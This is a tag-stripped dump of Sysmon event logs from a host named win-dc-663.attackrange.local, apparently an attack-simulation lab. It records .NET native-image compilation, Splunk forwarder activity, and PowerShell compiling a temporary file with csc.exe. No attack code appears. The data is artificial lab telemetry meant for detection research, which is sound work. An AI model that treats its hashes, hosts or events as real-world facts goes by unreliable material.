21:07:15.514{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-CA05-00000000CF01}7092C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Micro
soft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023553Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-A283-60D3-C905-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUFI8VEIJD\System.Data.SqlXml.ni.dll.auxMD5=F0874675F72593F9956DB47F31F19DBE,SHA256=29ED670438B542D3CE6370602A0E2B44EE075695C37889282D8011ADD511FEAA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023552Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.514{4DB9351A-A283-60D3-C905-00000000CF01}4776NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\MUFI8VEIJD\System.Data.SqlXml.ni.dllMD5=75AAEC3E04782FB17E8DD9BDBDC59175,SHA256=B7A69537F7E4A39B575FCF73621B1AA5673F28FB3313F4BB6F818464FEA34868,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023551Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
23542300x800000000000000023550Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.373{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B3265E52F7C02E84CF7A9A1FD91D5877,SHA256=6A856C0A9F61F4982E02820585665A571F886DF7BA5B6E2B14921AE21A92E9DE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023549Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023548Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:15.358{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A283-60D3-C905-00000000CF01}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023547Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-A282-60D3-C805-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCUQPUVQ00\System.Xml.ni.dll.auxMD5=E0D8C205AE8E4134695C6382D1687882,SHA256=9EE87305F6C9248CDE018A8B851FF1DD0411AF561B434DA7702D3603964ED01D,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x800000000000000023546Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:15.358{4DB9351A-A282-60D3-C805-00000000CF01}640NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\RCUQPUVQ00\System.Xml.ni.dllMD5=0806CABD7295931429C11278BCE28FCE,SHA256=5BFE97B592ED699B92F550258652FAE2E604E8881D36F97DC2131BB6553FF794,IMPHASH=00000000000000000000000000000000truetrue 354300x800000000000000023545Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:13.209{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61462-false10.0.1.12-8000- 10341000x800000000000000023653Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.967{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023652Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.967{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023651Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023650Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D505-00000000CF01}7056C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\F
ramework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000023649Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A284-60D3-D305-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRHZWXUQ4X\System.IdentityModel.Selectors.ni.dll.auxMD5=0268166FC40A38E6CC2DA46CE1D59E9E,SHA256=FA0420BF65C318DB22278C32316710585C444BB8472A7A7DB0F1303C3CC9E950,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000023648Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.951{4DB9351A-A284-60D3-D305-00000000CF01}3952NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\ZRHZWXUQ4X\System.IdentityModel.Selectors.ni.dllMD5=9D85263F4D48ABA9B33EAD2C83D255B5,SHA256=E36D92E5BDB03D9A747876B9783A7901AC47C635FEC912819A47B3547A2D6518,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000023647Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023646Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023645Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023644Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023643Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.938{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000023642Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.938{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\Sys
tem\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d8e81|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+7d828a|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\c9b7279c68fae45a93cbcb3e18dd69b7\Microsoft.PowerShell.Commands.Utility.ni.dll+ffb6fffd(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bed14bb(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beab0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982116(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.
dll+9beadaab(wow64) 154100x800000000000000023641Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.925{4DB9351A-A284-60D3-D405-00000000CF01}6900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line CompilerMicrosoft® .NET FrameworkMicrosoft Corporationcsc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline"C:\Users\Administrator\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=23EE3D381CFE3B9F6229483E2CE2F9E1,SHA256=4240A12E0B246C9D69AF1F697488FE7DA1B497DF20F4A6F95135B4D5FE180A57,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000023640Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.920{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000023639Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.920{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.cmdline2021-06-23 21:07:16.920 11241100x800000000000000023638Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:07:16.920{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\k4y1undg\k4y1undg.dll2021-06-23 21:07:16.920 23542300x800000000000000023637Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F11FE4DE461B22324DF622CBEB7D207E,SHA256=90E59EB81D958467FF3ED2984DE657A2879EE8FB9C8F92759607B4E6BABBF6F4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000023636Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:16.905{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000023635Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:07:16.905{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A284-60D3-D305-00000000CF01}3952C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.